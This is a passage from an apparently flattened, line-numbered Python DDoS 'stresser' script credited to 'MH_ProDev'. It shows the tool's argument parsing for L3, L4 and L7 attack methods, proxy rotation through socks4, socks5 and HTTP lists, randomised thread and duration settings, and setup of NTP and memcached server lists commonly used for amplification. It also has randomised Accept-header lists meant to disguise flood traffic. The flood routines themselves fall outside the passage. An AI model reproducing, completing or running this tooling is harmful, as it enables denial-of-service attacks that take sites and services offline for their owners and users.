| print(r.text) 1410 | 1411 | 1412 | def check(domain): 1413 | if str("http") not in str(domain): 1414 | domain = "http://" + domain 1415 | print('please wait ...') 1416 | r = requests.get(domain, timeout=20) 1417 | if str("50") in str(r.status_code): 1418 | die = "OFFLINE" 1419 | else: 1420 | die = "ONLINE" 1421 | print('\nstatus_code: '+r.status_code) 1422 | print('status: '+die+'\n') 1423 | 1424 | 1425 | def piger(siye): 1426 | if str("https") in str(siye): 1427 | domain = str(siye).replace('https', '').replace('/', '').replace(':', '') 1428 | elif str("http") in str(siye): 1429 | domain = str(siye).replace('http', '').replace('/', '').replace(':', '') 1430 | else: 1431 | domain = str(siye) 1432 | print('please wait ...') 1433 | r = pig(domain, count=5, interval=0.2) 1434 | if r.is_alive: 1435 | die = "ONLINE" 1436 | else: 1437 | die = "OFFLINE" 1438 | print('\nAddress: '+r.address) 1439 | print('Ping: '+r.avg_rtt) 1440 | print('Aceepted Packets: '+r.packets_received+'/'+r.packets_sent) 1441 | print('status: '+die+'\n') 1442 | 1443 | 1444 | def usgeaseets(): 1445 | global metho, url, SOCKST, thr, proxylist, muli, tim, l7s, l4s, tos, ots, l3s 1446 | socks = ["1", "4", "5"] 1447 | sockst = ["socks4.txt", "socks5.txt", "http.txt"] 1448 | try: 1449 | if sys.argv[3] not in socks: 1450 | SOCKST = Choice(socks) 1451 | elif sys.argv[3]: 1452 | SOCKST = sys.argv[3] 1453 | 1454 | else: 1455 | SOCKST = Choice(socks) 1456 | except: 1457 | SOCKST = Choice(socks) 1458 | 1459 | if (str(SOCKST) == str('1')): 1460 | proxylist = "http.txt" 1461 | else: 1462 | proxylist = "socks{0}.txt".format(SOCKST) 1463 | 1464 | try: 1465 | met = str(sys.argv[1]).upper() 1466 | if met not in list(methods): 1467 | metho = Choice(methods).lower() 1468 | elif sys.argv[1]: 1469 | metho = sys.argv[1] 1470 | else: 1471 | metho = Choice(methods).lower() 1472 | except: 1473 | metho = Choice(methods).lower() 1474 | try: 1475 | methos = metho.upper() 1476 | if (methos in l4) or (methos in l3): 1477 | url = sys.argv[2] 1478 | elif str("http") not in sys.argv[2]: 1479 | url = "https://example.ir" 1480 | elif sys.argv[2]: 1481 | url = sys.argv[2] 1482 | else: 1483 | url = "https://example.ir" 1484 | except: 1485 | url = "https://example.ir" 1486 | try: 1487 | if sys.argv[4]: 1488 | thr = sys.argv[4] 1489 | else: 1490 | thr = Intn(100, 1000) 1491 | except: 1492 | thr = Intn(10, 1000) 1493 | try: 1494 | if (sys.argv[5] not in sockst): 1495 | exit() 1496 | except IndexError: 1497 | pass 1498 | except: 1499 | print('socks type not found') 1500 | exit() 1501 | 1502 | try: 1503 | if sys.argv[6]: 1504 | muli = sys.argv[6] 1505 | else: 1506 | muli = Intn(5, 100) 1507 | except: 1508 | muli = Intn(5, 100) 1509 | try: 1510 | if sys.argv[7]: 1511 | tim = sys.argv[7] 1512 | else: 1513 | tim = Intn(10, 10000) 1514 | except: 1515 | tim = Intn(10, 10000) 1516 | 1517 | l4s = str(l4).replace("'", "").replace("[", "").replace("]", "") 1518 | l3s = str(l3).replace("'", "").replace("[", "").replace("]", "") 1519 | l7s = str(l7).replace("'", "").replace("[", "").replace("]", "") 1520 | tos = str(to).replace("'", "").replace("[", "").replace("]", "") 1521 | ots = str(ot).replace("'", "").replace("[", "").replace("]", "") 1522 | 1523 | 1524 | def usge(): 1525 | usgeaseets() 1526 | print('* Coded By MH_ProDev For Better Stresser') 1527 | print('python3 {} \n'.format(sys.argv[0])) 1528 | print(' > Methods:') 1529 | print(' - L3') 1530 | print(' | {} | {} Methods'.format(l3s, len(l3))) 1531 | print(' - L4') 1532 | print(' | {} | {} Methods'.format(l4s, len(l4))) 1533 | print(' - L7') 1534 | print(' | {} | {} Methods'.format(l7s, len(l7))) 1535 | print(' - TOOLS') 1536 | print(' | {} | {} Methods'.format(tos, len(to))) 1537 | print(' - Other') 1538 | print(' | {} | {} Methods'.format(ots, len(ot))) 1539 | print(' - All {} Method \n'.format(len(methodsl))) 1540 | print( 1541 | 'expmple:\n python3 {} {} {} {} {} {} {} {}'.format(sys.argv[0], metho, url, SOCKST, thr, proxylist, muli, tim)) 1542 | 1543 | 1544 | def makefile(text): 1545 | if text == "files/": 1546 | os.mkdir(text) 1547 | elif text == "files/proxys/": 1548 | os.mkdir(text) 1549 | else: 1550 | open(text, 'w').close() 1551 | print('File: ', text) 1552 | 1553 | if __name__ == '__main__': 1554 | import os, requests, socket, socks, time, random, threading, sys, ssl, datetime, cfscrape, re 1555 | from time import sleep 1556 | from icmplib import ping as pig 1557 | from scapy.layers.inet import TCP 1558 | from scapy.all import * 1559 | from socket import gaierror 1560 | acceptall = [ 1561 | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate", 1562 | "Accept-Encoding: gzip, deflate", 1563 | "Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate", 1564 | "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Charset: iso-8859-1Accept-Encoding: gzip", 1565 | "Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1", 1566 | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1Accept-Charset: utf-8, iso-8859-1;q=0.5", 1567 | "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*Accept-Language: en-US,en;q=0.5", 1568 | "Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Encoding: gzipAccept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1", 1569 | "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Encoding: gzipAccept-Language: en-US,en;q=0.5Accept-Charset: utf-8, iso-8859-1;q=0.5," 1570 | "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5", 1571 | "Accept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1", 1572 | "Accept: text/html, application/xhtml+xml", 1573 | "Accept-Language: en-US,en;q=0.5", 1574 | "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1", 1575 | "Accept: text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1", 1576 | ] 1577 | 1578 | data = "" 1579 | strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890" 1580 | Intn = random.randint 1581 | Choice = random.choice 1582 | if not os.path.exists('files/'): 1583 | makefile('files/') 1584 | if not os.path.exists('files/proxys/'): 1585 | makefile('files/proxys/') 1586 | if not os.path.exists('files/useragent.txt'): 1587 | makefile('files/proxys/useragent.txt') 1588 | if not os.path.exists('files/ntp_servers.txt'): 1589 | makefile('files/ntp_servers.txt') 1590 | if not os.path.exists('files/memcached_servers.txt'): 1591 | makefile('files/memcached_servers.txt') 1592 | if not os.path.exists('files/referers.txt'): 1593 | makefile('files/referers.txt') 1594 | try: 1595 | with open("files/useragent.txt", "r") as f: 1596 | readuser = str(f.readlines()).replace('\n', '').replace('\r', '') 1597 | with open("files/referers.txt", "r") as f: 1598 | readref = str(f.readlines()).replace('\n', '').replace('\r', '') 1599 | with open("files/memcached_servers.txt", "r") as f: 1600 | memsv = str(f.readlines()).replace('\n', '').replace('\r', '') 1601 | with open("files/ntp_servers.txt", "r") as f: 1602 | ntpsv = str(f.readlines()).replace('\n', '').replace('\r', '') 1603 | UserAgent = Choice(readuser) 1604 | referers = Choice(readref) 1605 | memcached_servers = Choice(memsv) 1606 | try: 1607 | bdr = str(sys.argv[1]).lower() 1608 | if bdr == "tools": 1609 | tools() 1610 | elif bdr == "stop": 1611 | stop() 1612 | elif bdr == "help": 1613 | usge() 1614 | elif len(sys.argv) <= int(7): 1615 | usge() 1616 | else: 1617 | main() 1618 | except IndexError: 1619 | usge() 1620 | except KeyboardInterrupt: 1621 | sys.exit() 1622 | except IndexError: 1623 | usge() 1624 | 1625 | --------------------------------------------------------------------------------